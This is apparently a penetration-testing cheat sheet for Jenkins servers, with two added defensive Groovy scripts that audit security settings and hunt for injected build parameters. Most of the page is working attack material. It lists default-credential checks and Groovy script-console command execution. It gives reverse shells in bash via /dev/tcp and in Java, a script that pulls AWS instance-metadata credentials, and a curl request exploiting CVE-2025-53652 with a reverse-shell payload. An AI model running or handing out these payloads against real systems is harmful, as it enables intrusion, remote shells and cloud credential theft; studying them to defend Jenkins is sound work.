# Jenkins

## Discovery/Footprinting

Jenkins runs on Tomcat port 8080 by default. It also uses port 5000 to attach agent (slave) servers.

## Open Registration

```
/signup
/jenkins/signup
```

## Enumeration

`http://jenkins.inlanefreight.local:8000/configureSecurity/`

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4Zht49nVJxNmFr0f7aez%2Fimage.png?alt=media&#x26;token=28b86450-2137-461f-b8fe-1e4b673a1f59" alt=""><figcaption></figcaption></figure>

`http://jenkins.inlanefreight.local:8000/login?from=%2F`

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FURSyNFwGqeMm3prrJrdb%2Fimage.png?alt=media&#x26;token=9a50c123-9b9e-4b9c-ba8a-9f4afcd3fa64" alt=""><figcaption></figcaption></figure>

Check for default credentials such as `admin:admin`, or for instances that have no authentication enabled at all. It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test.
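An audit script, added here and not part of the original page, that a Jenkins administrator can paste into the script console to report the weaknesses listed in this section (no security realm, open sign-up, anonymous administrators, anonymous read). It uses only core Jenkins APIs (`hasPermission2` needs Jenkins 2.266 or later); the `APPLY_FIX` flag and the remediation it gates are choices of this example.

```groovy
import jenkins.model.Jenkins
import hudson.security.SecurityRealm
import hudson.security.AuthorizationStrategy
import hudson.security.HudsonPrivateSecurityRealm
import hudson.security.FullControlOnceLoggedInAuthorizationStrategy

// Set to true to apply the remediation at the bottom. Create an admin account
// in the local realm first, otherwise the change locks everyone out.
def APPLY_FIX = false   // assumption of this example

def j = Jenkins.get()
def findings = []

// "No authentication" is the case described in the enumeration section
if (!j.isUseSecurity() || j.securityRealm == SecurityRealm.NO_AUTHENTICATION) {
    findings << "No security realm: /script and /configureSecurity are open to everyone"
}
// Open registration: /signup and /jenkins/signup accept new accounts
if (j.securityRealm.allowsSignup()) {
    findings << "Self-registration enabled (/signup)"
}
def strategy = j.authorizationStrategy
if (strategy instanceof AuthorizationStrategy.Unsecured) {
    findings << "Authorization 'Anyone can do anything': every visitor is an administrator"
}
if (strategy instanceof FullControlOnceLoggedInAuthorizationStrategy && strategy.isAllowAnonymousRead()) {
    findings << "Anonymous read allowed: job configs and console output are exposed"
}
// Overall/Administer is the permission that gates the script console
if (j.getACL().hasPermission2(Jenkins.ANONYMOUS2, Jenkins.ADMINISTER)) {
    findings << "Anonymous users hold Overall/Administer"
}

println findings ? "WEAK SETTINGS:\n- " + findings.join("\n- ") : "No weak settings found"

if (APPLY_FIX && findings) {
    // Local accounts, no self-registration, no captcha; nothing for anonymous
    j.setSecurityRealm(new HudsonPrivateSecurityRealm(false, false, null))
    def hardened = new FullControlOnceLoggedInAuthorizationStrategy()
    hardened.setAllowAnonymousRead(false)
    j.setAuthorizationStrategy(hardened)
    j.save()
    println "Applied: local realm without sign-up, logged-in users only"
}
```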

## Admin access - Script Console

Before 2.0: Admin access

```
http://jenkins_server/script
```

Arbitrary Groovy scripts can be executed from this console: <https://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html>

#### Linux

`http://jenkins.inlanefreight.local:8000/script`

```groovy
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FkSWxdUrCy2qrrN3wUdW8%2Fimage.png?alt=media&#x26;token=8c3d84d7-79a1-478b-b5ef-1cb1d2ac71fc" alt=""><figcaption></figcaption></figure>

#### Windows

```groovy
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
```

### Reverse Shell

#### Linux

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

```shell-session
$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 57844
id
uid=0(root) gid=0(root) groups=0(root)
/bin/bash -i
root@app02:/var/lib/jenkins3#
```

#### Metasploit

`msf > use exploit/multi/http/jenkins_script_console`

#### Windows

{% embed url="<https://github.com/Brzozova/reverse-shell-via-Jenkins>" %}

{% embed url="<https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76>" %}

```groovy
String host = "localhost";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
};
p.destroy();
s.close();
```

## Retrieve AWS credentials

Requires access to the Groovy script console. The script below queries the EC2 instance metadata service from the Jenkins host: it first requests an IMDSv2 token, then uses it to read the `/latest/` tree.

```groovy
def tokenCommand = 'curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"'
def dataCommand = 'curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/'

def proc1 = ['sh', '-c', tokenCommand].execute()
def token = proc1.text.trim() // Get the token from the first command
proc1.waitFor()

if (proc1.exitValue() == 0) {
    def proc2 = ['sh', '-c', dataCommand.replace('$TOKEN', token)].execute()
    def errorBuffer = new StringBuffer()
    proc2.consumeProcessErrorStream(errorBuffer)
    println(proc2.text) // Print the response
    println(errorBuffer.toString()) // Print error messages, if any
} else {
    println("Failed to retrieve token: ${proc1.err.text}")
}
```

## No admin access, but able to add or edit build steps

{% embed url="<https://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html>" %}

{% embed url="<https://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html>" %}

Add a build step of type "Execute Windows batch command" and enter:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FWeeQiA6b3hR1AbO5TL4Z%2Fimage.png?alt=media&#x26;token=374e16e5-da0c-406e-bb88-042717c9100b" alt=""><figcaption></figcaption></figure>

```
powershell -c command
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FIeSSFxKPJb0gRpszp7Gn%2Fimage.png?alt=media&#x26;token=a395df27-2c61-4e76-8853-d4d0e2637af2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FyHd6NORqEges7VTNA83w%2Fimage.png?alt=media&#x26;token=5b249d00-f390-44b4-b201-78a87d941557" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FEKzuwgHTWtLzXv3jprlI%2Fimage.png?alt=media&#x26;token=38bb6103-e567-441a-9dc5-3397aed60615" alt=""><figcaption></figcaption></figure>

## CVE-2025-53652 - Command Injection via Git Parameter

```
curl -kv 'http://jenkins:8080/job/[buildName]/build' -X POST \
  -H 'Cookie: [cookie];' \
  --data-urlencode 'Jenkins-Crumb=[crumb]' \
  --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"\$(bash -c \"bash &> /dev/tcp/10.9.49.196/1270 <&1\")"}}'
```

{% embed url="<https://www.vulncheck.com/blog/git-parameter-rce>" %}

{% embed url="<https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis>" %}
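A hunting script, added here and not part of the original page or the linked analysis, for the injection shape shown in the curl request above: it walks recent builds and reports any parameter value carrying shell metacharacters, which a branch or tag name supplied through a Git Parameter should never contain. Assumed: it is run from the script console on the controller; the character class and the 50-build look-back window are choices of this example.

```groovy
import jenkins.model.Jenkins
import hudson.model.Job
import hudson.model.ParametersAction
import hudson.model.Cause

// Characters that enable command substitution or chaining in sh/bash;
// a legitimate ref name (refs/heads/main, v1.2.3) never contains them
def SUSPICIOUS = ~/[\$`;|&<>(){}\n]/
def BUILDS_PER_JOB = 50   // look-back window; assumption of this example

def hits = []
Jenkins.get().getAllItems(Job).each { job ->
    job.builds.limit(BUILDS_PER_JOB).each { build ->
        def params = build.getAction(ParametersAction)?.parameters ?: []
        params.each { p ->
            def v = p.value?.toString()
            if (v && SUSPICIOUS.matcher(v).find()) {
                // Who triggered the build: user id, or "unknown" for API/remote triggers
                def who = build.getCause(Cause.UserIdCause)?.userId ?: "unknown"
                hits << "${job.fullName} #${build.number} by ${who}: ${p.name}=${v.take(80)}"
            }
        }
    }
}

println hits ? "SUSPICIOUS PARAMETER VALUES:\n- " + hits.join("\n- ")
             : "No suspicious parameter values in the last ${BUILDS_PER_JOB} builds per job"
```

A hit is a lead, not proof: pair it with the plugin version check from the linked analysis and with the job's console output before treating it as an intrusion.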

## CVE-2024-23897 - Arbitrary File Read Vulnerability Leading to RCE

{% embed url="<https://github.com/binganao/CVE-2024-23897>" %}

{% embed url="<https://github.com/h4x0r-dz/CVE-2024-23897>" %}

{% embed url="<https://0xdf.gitlab.io/2024/02/12/htb-builder.html#authenticate-jenkins-access>" %}

## CVE-2024-43044 - Arbitrary file read that allows an agent to fetch files from the controller

{% embed url="<https://github.com/convisolabs/CVE-2024-43044-jenkins>" %}

## Tools

JenkinsVulnFinder

{% embed url="<https://github.com/Bhanunamikaze/JenkinsVulnFinder>" %}

## Resources

{% embed url="<https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html>" %}

{% embed url="<https://www.hackingarticles.in/jenkins-penetration-testing/>" %}

{% embed url="<https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/web/jenkins-pentesting/>" %}


## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs, such as cross-site scripting, insecure direct object references, and server-side request forgery.
